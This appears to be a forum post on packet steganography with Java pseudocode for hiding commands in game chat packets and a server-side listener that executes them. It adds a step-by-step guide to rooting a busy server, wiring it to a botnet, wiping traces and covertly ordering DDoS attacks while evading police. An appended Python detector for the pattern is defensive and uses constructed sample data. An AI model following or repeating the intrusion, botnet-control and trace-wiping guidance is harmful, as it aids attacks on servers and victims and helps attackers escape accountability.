Aerosol, Posted March 22, 2015

The Packet

Let's look at the packet. That's the thing that makes the internet work; lots of data goes on those, anywhere from 20 bytes to 65335 bytes. However, in practice packets are usually around 600 bytes in size. That data stores a lot of info; some is redundant, some is needed, and some is 0'd out. There's a header, a body, extra space, and then error check and footer. It's actually kind of easy to end up with a couple of screwed-up bits in a packet (obviously not every packet is screwed up, but it's not 1 out of every million either).

Changing a little bit of the Packet

What packet steganography is about is changing a couple of bits over a couple of packets. Similar to image steganography, it's almost impossible to detect (in small quantities) (assuming feds are downloading all the data), as packets are not known to all be made equally.

I'm going to quickly give an example.

Game A wants to send packet
[00010101010001000010101010...000010101011000101...]
to Game Server 3. However, you can copy that packet and then resend a slightly modified one, which will look like:
[00010101010001000010101010...111110101001001000...]

Since a massive amount of data is constantly being sent back and forth from the server to you, the packets can be modified a decent amount so information is carried, but one doesn't have to break the checksum by modifying too many bytes. Multiply 40 bits over a couple thousand packets, and a decent amount of data can be sent covertly from you to the server.

What's the best part of this? If you hack servers that get a lot of traffic, it's almost impossible to tell who sent what modded packets to the server even if all of the data is logged, because every single packet appears to be legitimate.

While there is a decent amount of modded data transferred, you can't just go and start downloading ripped movies with this. The point of packet steganography isn't to anonymize your downloads, but to send little messages over networks that won't be found by normal means.

Obviously, if person A tries to send messages to person B, A won't send them directly. Instead, he could keep them in an encrypted part of a server. When person B wants to see the message, he unlocks the message by passing the correct key.

Pseudocode example using MS

Maplestory packets are nice, because they used to be pretty obvious as to what was going on. After the packet header came the data of A) what action you were doing and (if a message) what the message was. The message was in plaintext hexadecimal format. Using the code below, we are going to edit a little character of every single message. To anyone looking at the packet it still appears to be a normal message, just with a small typing error. However, to the server and to you, the message really is no longer a message anymore. It's a specific set of instructions. The first couple of whispers to some random person validate to the server that you are the IP to grab the packets from. The final whisper (or packet) the server sees is a specific command to the server.
It could be wipe the program on it, it could be tell these servers to do x, y, and z, or it could just be telling the server that there is going to be a new pattern to look out for, and at what certain time.

Code for your side:

```java
public class Whatever {
    // obviously it depends for whatever server you hacked into, and what app communicates
    // with the server, but for now let's pretend we hacked into a maplestory server
    // cool thing about MS is that the packets are pretty easy to understand
    // yes I realize I am turning Java into a scripting language below, but w/e
    // (scan, XClass, neededPacket, Action, Type, IP, Add_Instruct, grabHeader, grabFooter
    // and mod are placeholders the post never defines)
    public void initContact() {
        for (int i = 0; i < 10; i++) {
            String x = scan.grabPacket();
            // overwrite characters 12..13 with the loop counter as a repeated hex digit
            x = x.substring(0, 12) + Integer.toHexString(i) + Integer.toHexString(i)
                    + x.substring(14, x.length());
            XClass.sendPacket(x);
            // totally possible if string x winds up being a valid packet, which it is since it's just hex
            // obviously you have to make a sendPacket method
            if (scan.nextPacket.equals(neededPacket))
                XClass.sendPacket(endPacket(Action, Type, IP, Add_Instruct));
            else
                System.out.println("Connection was unable to be made");
        }
    }

    public String endPacket(String x1, String x2, String x3, String x4) {
        return grabHeader() + " 3A BB 0C FF 2D " + mod(x1) + " " + mod(x2) + " 3C "
                + mod(x3) + " 85 26 " + mod(x4) + grabFooter();
    }
}
```

Code for the server (the server is not constantly loading all packets, it only works for a specific amount of time):

```java
import everything2.etc;
// you have to watch out the data storage for this one
// (XClass, PacketList, Method, StartClass, translate and run are placeholders the post never defines)

class ServerInner {
    public void acceptEverything() {
        // kills program in 2 minutes
        long num = 2 * 60 * 1000; // min*sec*milli
        Timer t = new Timer();
        t.schedule(new TimerTask() { public void run() {} }, num);
        // no this isn't a legit method, you'd want to use outside resources for this part
        // but at least the method dies in the two minute timeframe
        XClass.storeAllPackets();
    }

    public void sortThrough(PacketList p, Method a) {
        int x = p.length();
        // drop every packet that does not follow the agreed pattern
        for (int i = 0; i < p.length(); i++) {
            if (!a.follows(p.get(i))) {
                p.rem(i);
                i--;
            }
        }
        // after that method runs, the only packets left should be from you
        // obviously it is theoretically possible someone else did the exact same as you, so you'd then check them
        for (int i = 0; i < p.length(); i++) {
            if (!a.check(p.get(i))) {
                p.rem(i);
                i--;
            }
        }
        // now all that's left is the correct one
    }

    public void finishUP() {
        if (p.length() > 0) {
            // translates the info packet from the correct IP if an ip was gathered
            translate(XClass.nextPacketFrom(p.get1IP()), a);
            // runs whatever it got
            run();
        }
        // wipes all data that was stored, logs in database
        StartClass.wipe();
    }
}
```

Rough Example in Real Life Application

Packet steganography can also be used for sending out instructions to a botnet, since you don't really need to send that much information to tell x to DDOS y, now do you?

Here's a rough guide of how you'd accomplish communicating through your bots to start a DDOS attack w/ packet steganography, from setting up the server to attacking the kid who beat you in MW3:

1) Find a good server that has a decent amount of traffic, but nothing too sketchy.
2) Get root access on this server.
3) Download Wireshark if you don't already have it.
4a) Write your program to test the Wireshark logs to find a pattern in packet anomalies (you figure this one out on your own).
4b) Write the program that can send out edited packets from your machine.
5) Set up another program that connects the Wireshark program with your botnet server.
6) Set up a last program that wipes your traces of you fucking off with the server.
7) Run 6 and leave the shell you set up if you want (I suggest keeping some part of it intact though, depends on what you want to do).
8) Set up a couple more of these stego servers.
9) Realize that you can now send instructions easily but make it look like it's a normal connection. Want to DDOS server agh554? Connect with one of those servers and send the right kind of packets for a little while. Next thing you know your DDOS servers will be connecting with each other to get the details down and start the attack at the time specified.
Because of the way the information is transferred from you to the server, it'll be hard to trace the botnet back to you and then convict you as the one who pulled the strings behind a DDOS of a n00b MW3 player.

I know that a couple of people already do this, but now you know how to.

Ending Thoughts (Read it though)

So why the hell does this matter?

A) All the data will look legitimate.
B) You can send it from different sources and it doesn't really matter, as long as the packets are getting screwed correctly.
C) You think it's easy to look through every single packet sent to a server that gets a lot of traffic for the past 4ish months and then find the packets that link with the pattern?
D) Can be used for stuff other than botnets:
   i) You can send encryption keys through this and then wipe the programs you installed.
   ii) Anonymous communication.
E) MITM attacks don't matter unless the MITM got your src (look at number 4).

Problems with this?

1) Server gets taken by the feds. They won't be too happy about this.
2) A wingding manages to replicate the correct stream, and then gives out commands for your server. This is something you'll just have to accept. Anonymity is what we are going for; too many traces = too many chances of someone finding a link.
3) No well-known VPNs allow packet modification at the moment.
4) If the feds got your SRC since you and 800 other skids are using the same program, and they catch you are modding packets, you're kinda screwed if they catch you red-handed.
5) "I don't get it."

Solutions to the problems

1) If modded packets are the only connections between your bots and your servers, it's a lot harder to trace since the server has a massive amount of people using it.
2) Nothing really; make it so it can't easily be replicated.
3) Wait for it [breathing intensifies].
4) Don't be a skid.
5) See above. Or, read the links at the bottom of the page, learn something interesting, and prove to me that there are users with brains here.

Credits: TF
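The channel the post describes has a narrow, repeatable fingerprint: the client keeps the chat payload identical and overwrites a fixed two-character slice with a repeated hex digit that steps by one per message. That is exactly what a monitor on the server side can look for. The following Python detector is an added example, not code from the original post or its author; the record format (source address plus hex payload), the slice offsets, the addresses and every payload are constructed for illustration. It groups payloads by source and flags a source whose messages are all the same length, differ from one another only inside the fixed slice, and carry a counter in that slice.

```python
"""Detector for the fixed-slice counter pattern described in the post.

Added example; the record format (source address, hex payload), the slice
offsets and every payload below are constructed for illustration."""
from collections import defaultdict

# The post's client code rewrites characters 12..13 of each payload with
# Integer.toHexString(i) twice, i.e. "00", "11", "22", ... per message.
SLICE_START, SLICE_END = 12, 14


def diff_positions(a: str, b: str) -> list[int]:
    """Indices at which two equal-length strings differ."""
    return [i for i, (ca, cb) in enumerate(zip(a, b)) if ca != cb]


def looks_like_counter(slices: list[str]) -> bool:
    """True when the slices are a repeated hex digit that steps by one
    from message to message ("00", "11", "22", ...), the post's encoding."""
    values = []
    for s in slices:
        if len(s) != 2 or s[0] != s[1] or s[0].lower() not in "0123456789abcdef":
            return False
        values.append(int(s[0], 16))
    return len(values) >= 3 and all(b - a == 1 for a, b in zip(values, values[1:]))


def find_suspicious_sources(records, min_msgs: int = 4) -> dict[str, str]:
    """records: iterable of (src_ip, payload_hex).

    Flags a source when all of its payloads have the same length, differ
    from the first one only inside [SLICE_START:SLICE_END], and the slice
    values step like a counter. Ordinary chat from one user changes the
    message body, so its differences spill outside the slice."""
    by_src: dict[str, list[str]] = defaultdict(list)
    for src, payload in records:
        by_src[src].append(payload)

    flagged: dict[str, str] = {}
    for src, payloads in by_src.items():
        if len(payloads) < min_msgs:
            continue
        base = payloads[0]
        if any(len(p) != len(base) for p in payloads):
            continue  # mixed lengths: not the fixed-slice pattern
        diffs = set()
        for p in payloads[1:]:
            diffs.update(diff_positions(base, p))
        if not diffs or not all(SLICE_START <= i < SLICE_END for i in diffs):
            continue
        slices = [p[SLICE_START:SLICE_END] for p in payloads]
        if looks_like_counter(slices):
            flagged[src] = (f"{len(payloads)} payloads differ only at "
                            f"[{SLICE_START}:{SLICE_END}] and the slice counts up")
    return flagged


# Constructed sample: a 12-char header, the 2-char slice, an 11-byte body.
HEADER = "0A1B2C3D4E5F"
COVERT_BODY = "48656C6C6F20776F726C64"  # "Hello world"
SAMPLE_RECORDS = [
    # Covert sender: identical chat, only the slice changes, as a counter.
    *[("10.0.0.5", HEADER + f"{i:x}{i:x}" + COVERT_BODY) for i in range(5)],
    # Ordinary user: same length, but the body changes every message.
    ("10.0.0.9", HEADER + "00" + "48656C6C6F20776F726C64"),
    ("10.0.0.9", HEADER + "00" + "6865792074686572652121"),
    ("10.0.0.9", HEADER + "00" + "73616D6520746F20796F75"),
    ("10.0.0.9", HEADER + "00" + "73656520796120736F6F6E"),
    # Too few messages to judge.
    ("10.0.0.7", HEADER + "00" + COVERT_BODY),
]

if __name__ == "__main__":
    for src, reason in find_suspicious_sources(SAMPLE_RECORDS).items():
        print(f"{src}: {reason}")
```

The check is deliberately tied to the encoding the post's client uses (a fixed offset, a repeated digit, a step of one); a sender who varies the offset or the encoding defeats it. The more general observation it rests on still holds: legitimate chat from one user varies across the message body, while a covert channel that must keep the payload "looking normal" concentrates its changes in a small, stable region. Baselining per-source difference positions over a longer window is the natural extension.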